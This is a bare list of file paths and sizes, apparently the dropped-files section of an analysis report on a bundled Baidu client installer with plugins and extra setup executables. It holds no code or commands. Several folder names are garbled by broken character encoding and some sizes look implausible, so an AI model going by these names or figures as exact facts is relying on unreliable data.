%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\res_xinwen.png (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\1px.png (947 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\resouUI.xml (340 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\music_play.png (155 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\loading.png (1552 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\sunny.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\PluginSetup.xml (622 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\settings.css (2392 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-bottom-right.png (259 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-bottom-center.png (143 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\icon-clear-general-png8.png (841 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\res_bianqian.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\skinres.rdb (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\new.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\libs\jquery-1.11.1.min.js (3312 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\gray1px.png (918 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\download-hover.png (177 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\iconall.gif (94 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\json2.js (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\privacy.png (296 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\ice-rain.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\PWidgetAppCommonBase.dll (14384 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\rpt.dat (120 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\login_z.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\MsgPush.dll (31072 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\iframe_loading.gif (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\input.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\favicon.ico (5 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\testIO.exe (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\Setting.rdb (3712 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\snow-storm.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\icon_jietu.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq5.tmp (447624 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\executor.xml (234 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\BDSearchBar.rdb (6624 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\bookmarks.html (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\global.js (8184 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\yinyue\1.0.0.0\PluginSetup.xml (616 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-checkbox-checked.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\mg-newtab.png (197 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\1.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\icon_xiaoxizhongxinNotify.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\general.png (379 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\green_arrow_down.png (150 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\cloudy.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\history_z.png (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\light-snow.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\se\icon-taobao.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\input.png (214 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\XiaoXiUINotify.xml (412 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\error-pages_z.png (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\unknown.png (480 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\vedio_play.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\font\open-sans\OpenSans-Light-webfont.eot (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-top-right.png (202 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\arrow-png8.png (260 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Utils.dll (46592 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\folder-arrow-png8.png (292 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\bookmarks.css (9 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\icon-clear-general.png (866 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-radio-checked.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\red_arrow_down.png (944 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\reset.css (826 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\skinres.rdb (1856 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\dust.png (812 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BrowserCore.dll (67072 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\ie-fix.css (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\res_xiaoxizhongxinNotify.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\loading.png (1552 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Baidu.exe (24048 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\ice-rain.png (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\js\bookmarks_mods.js (1856 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\se\icon-baidu.png (367 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\green_arrow_down.png (944 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\arrow.png (203 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\PluginSetup.xml (616 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\PluginSetup.xml (616 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\kuaidi.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\bg-circle-loading.png (6 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\red_arrow_down.png (150 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\executor.xml (232 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Report.dll (7232 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\365.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb6.tmp\Protocol.dll (12024 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\moderate-snow.png (992 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\icon-tree-search-ie8.png (15 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\CommonWorker.dll (3712 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\343.png (4 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\unknown.png (851 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\bg-circle-loading-large.png (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb6.tmp\Base.dll (38904 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\error-pages.css (7 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\sleet.png (436 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\png8-dialog-close.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\368.png (5 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\gz.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BrowserFrame.dll (67494 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\logo25x29.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\qxdh20140619.png (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\AppContainer.rdb (10 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\cloudy.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\363.png (4 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\duststorm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\red_arrow_up.png (943 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-button-new.png (977 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\thundershower-with-hail.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\AppHTMLXinWen.xml (442 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\app-reload.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-button.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb6.tmp\BDMSkin.dll (30464 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\moderate-rain.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-searchbox.png (893 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\server-storm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\DetectVm.dll (4784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\snow-flurry.png (847 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\folder-arrow-hover-png8.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\AppHTMLReSou.xml (438 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\green_arrow_up.png (943 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\weixin\1.0.0.0\icon_weixin.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\storm.png (815 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BDMSkin.dll (60928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mb_setup.log (2617 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\jietu\1.0.0.0\skinres.rdb (23424 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Download.dll (4784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\heavy-rain.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\music_play.png (960 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BaiduUpdate.exe (11040 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\GlobalPluginInfo.xml (6 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\connection-fail.html (2 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\libs\jquery.color-2.1.2.min.js (6 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\AppHTMLGuPiao.xml (440 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\loading.png (1552 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\new.png (232 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\heavy-rain.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\icon_xiaoxizhongxin.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\bianqian\1.0.0.0\bianqianDll.dll (16 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\BrowserNotify.rdb (14384 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\bdb_scheme.dat (1484 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\mg-refresh.png (215 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\top\347.png (4 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\heavy-storm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\light-rain.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\font\open-sans\OpenSans-Light-webfont.svg (4992 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\se\icon-baidu1.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xiaoxizhongxin\1.0.0.2\AppHTMLXiaoXi.xml (440 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-radio-tooltip-png8.png (329 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\thundershower.png (898 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb6.tmp\BDWebDownload.dll (7192 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Skins\CommonRes.rdb (74736 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\duststorm.png (811 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\enter.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\user_data\default\bookmark\bookmark.db (20 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\split_g.png (968 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\atl100.dll (10128 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\download.png (177 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\js\libs\dataReport.js (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\pack.css (784 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\red_arrow_up.png (154 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\CheckerProxy.dll (10128 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\xinwen\1.0.0.0\skinres.rdb (1856 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\resou\1.0.0.0\icon_resou.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\head-star-png8.png (450 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\severe-storm.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\download.png (991 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb6.tmp\msvcr100.dll (25824 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\bookmarks\res\css\img\png8-dialog.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\BDClientProxy.dll (45104 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\overcast.png (680 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\ala.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\font\open-sans\OpenSans-Light-webfont.ttf (1552 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\sunny.png (856 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\mg-foward.png (156 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\light-snow.png (918 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\settings_z.png (11 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\bg-box-shadow-top-center.png (122 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\Baidu\plugin\extends\gupiao\1.0.0.2\res_gupiao.png (3 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\8\split_g.png (248 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\Heartbeat.dll (14384 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\moderate-snow.png (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\error-pages\ssl-error.html (1 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\img\png8-login-success.png (824 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\res\css\img\mg-back.png (154 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\sf.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb6.tmp\Utils.dll (23296 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb6.tmp\msvcp100.dll (14184 bytes)
%Documents and Settings%\%current user%\AppData\Local\Baidu\BaiduClient\1.6.200.359\LocalPages\apps\aladdin\res\css\img\sand.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz3.tmp\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz3.tmp\InstallHelper.dll (26688 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz3.tmp\BDMSkin.dll (37727 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz3.tmp\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
%WinDir%\Temp\baidu\youqian\ÃƒÂ¦Ã‚Â¡Ã…â€™ÃƒÂ©Ã‚ÂÃ‚Â¢ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦\YouQian_Setup.exe (25112 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz3.tmp\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz3.tmp\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
%WinDir%\Temp\baidu\youqian\ÃƒÂ¦Ã‚Â¡Ã…â€™ÃƒÂ©Ã‚ÂÃ‚Â¢ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦\ÃƒÂ¦Ã‚Â¡Ã…â€™ÃƒÂ©Ã‚ÂÃ‚Â¢ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦.ini (1607 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj2.tmp (284894 bytes)
%WinDir%\Temp\baidu\youqian\ÃƒÂ¦Ã‚Â¡Ã…â€™ÃƒÂ©Ã‚ÂÃ‚Â¢ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦\process.cfg (210 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz3.tmp\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz3.tmp\Microsoft.VC80.CRT\msvcp80.dll (19096 bytes)
%WinDir%\Temp\baidu\youqian\ÃƒÂ¦Ã‚Â¡Ã…â€™ÃƒÂ©Ã‚ÂÃ‚Â¢ÃƒÂ§Ã¢â€žÂ¢Ã‚Â¾ÃƒÂ¥Ã‚ÂºÃ‚Â¦\132.exe (172202 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\data\slimdata.dat (784 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\ErrorMsg.xml (196 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\readme.txt (1 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\KZReport.exe (5232 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\Uninst.exe (8122 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\7zNew.dat (32 bytes)
%Program Files%\Ãƒâ€šÃ‚Â¿ÃƒÆ’Ã‚Â¬ÃƒÆ’Ã¢â‚¬ËœÃƒâ€šÃ‚Â¹\X86\SetupHelper.exe (667 bytes)
